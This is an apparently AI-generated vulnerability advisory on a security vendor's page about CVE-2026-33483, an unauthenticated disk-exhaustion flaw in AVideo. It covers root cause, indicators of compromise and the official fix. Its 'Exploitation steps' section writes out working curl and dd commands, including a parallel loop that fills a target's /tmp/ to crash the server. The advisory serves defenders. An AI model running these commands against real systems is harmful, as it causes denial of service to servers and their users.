CVE-2026-33483: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33483 is an unauthenticated disk space exhaustion vulnerability in WWBN AVideo, affecting all versions up to and including 26.0. The flaw resides in the objects/aVideoEncoderChunk.json.php endpoint, which accepts arbitrary POST data and writes it to persistent temp files in /tmp/ with no authentication, no size limits, and no cleanup mechanism. Disclosed on March 20, 2026, via a GitHub Security Advisory, it carries a CVSS v3.1 base score of 7.5 (High) (GitHub Advisory).

Technical details

The root cause is CWE-770 (Allocation of Resources Without Limits or Throttling): the aVideoEncoderChunk.json.php script operates entirely outside the AVideo framework with no require_once, no session handling, and no calls to authentication functions such as useVideoHashOrLogin() or canUpload(). It reads raw POST body via php://input in 1MB chunks and writes them to a temp file created with tempnam(sys_get_temp_dir(), 'YTPChunk_'), with the effective upload limit being PHP's post_max_size (AVideo's .htaccess references a commented-out 4GB setting). Compounding the issue, the endpoint sets Access-Control-Allow-Origin: *, enabling cross-origin exploitation from any malicious webpage, and the response JSON discloses the full filesystem path of the created temp file (e.g., {"file":"/tmp/YTPChunk_abc123","filesize":104857600}). The endpoint is publicly routed via .htaccess rewrite at /aVideoEncoderChunk.json (GitHub Advisory).

Impact

Successful exploitation causes cascading denial-of-service: filling /tmp/ breaks PHP session handling, causes MySQL temporary table operations to fail, and crashes system services relying on tmpfs — potentially taking down the entire server, not just the AVideo application. Because created files are never cleaned up automatically, even a brief attack has persistent impact requiring manual administrator intervention. Additionally, the endpoint leaks the server's filesystem directory structure via the temp file path returned in the JSON response (GitHub Advisory).

Exploitability

A proof-of-concept exploit consisting of explicit curl commands and bash scripts is publicly available in the official security advisory, rated high confidence by Feedly threat intelligence. The PoC demonstrates writing 100MB files and running 10 concurrent requests (totaling 1GB) to exhaust disk space. No authentication is required, and the CORS wildcard header enables distributed exploitation through visitors' browsers on any malicious website, effectively bypassing IP-based rate limiting. The EPSS score is approximately 0.395% (0.61% per the GitHub Advisory), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing AVideo instances (versions ≤ 26.0) using search engines or tools like Shodan, looking for the /aVideoEncoderChunk.json endpoint.
  2. Confirm unauthenticated access: Send a minimal POST request to verify the endpoint is accessible and returns a temp file path:
curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary 'test'
# Expected: {"file":"/tmp/YTPChunk_XXXXXX","filesize":4}
  1. Write large temp files: Use dd piped to curl to write 100MB files per request:
dd if=/dev/zero bs=1M count=100 2>/dev/null | \
  curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary @-
  1. Parallel disk exhaustion: Launch multiple concurrent requests to rapidly fill /tmp/:
for i in $(seq 1 10); do
  dd if=/dev/zero bs=1M count=100 2>/dev/null | \
    curl -s -X POST https://target/aVideoEncoderChunk.json \
    -H 'Content-Type: application/octet-stream' \
    --data-binary @- &
done
wait
  1. Achieve DoS: Once /tmp/ is full, PHP session handling, MySQL temp tables, and tmpfs-dependent services fail, taking down the server. Files persist indefinitely until manual cleanup (GitHub Advisory).

Indicators of compromise

  • Network: High volume of HTTP POST requests to /aVideoEncoderChunk.json (or the underlying objects/aVideoEncoderChunk.json.php) from multiple source IPs; large Content-Length values in POST requests to this endpoint; cross-origin requests from unexpected referrer domains.
  • File System: Presence of numerous files matching the pattern /tmp/YTPChunk_*; unusually high /tmp/ directory disk usage; files in /tmp/ with YTPChunk_ prefix that are not being consumed or deleted.
  • Logs: Web server access logs showing repeated POST requests to /aVideoEncoderChunk.json with large payloads; PHP error logs showing disk-full errors or failed tempnam() calls; MySQL error logs indicating failure to create temporary tables due to disk space exhaustion.
  • System: Disk usage alerts on the partition hosting /tmp/; PHP session creation failures; service crashes for applications relying on tmpfs (GitHub Advisory).

Mitigation and workarounds

The official fix is commit 33d1bae6c731ef1682fcdc47b428313be073a5d1, which rewrites objects/aVideoEncoderChunk.json.php to enforce authentication checks, enforce a configurable upload size limit (e.g., 200MB), abort and delete temp files if the stream exceeds the limit, and avoid exposing the full filesystem path in the response (AVideo Commit). Administrators should update AVideo to a version beyond 26.0 that includes this patch. As interim workarounds: block or restrict access to /aVideoEncoderChunk.json at the web server or firewall level; implement network-level rate limiting on POST requests to this endpoint; add a cron job to periodically remove /tmp/YTPChunk_* files older than a configurable threshold (e.g., 1 hour); and replace the CORS wildcard header with a restrictive Access-Control-Allow-Origin policy (GitHub Advisory).

Community reactions

The vulnerability was reported by a researcher identified as "offset" and published by AVideo maintainer DanielnetoDotCom on March 20, 2026. Coverage appeared on security aggregators including VulDB, CVEFeed, and Mastodon security feeds shortly after disclosure. A dedicated write-up was published at infinitsec.net highlighting the unauthenticated disk exhaustion angle (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management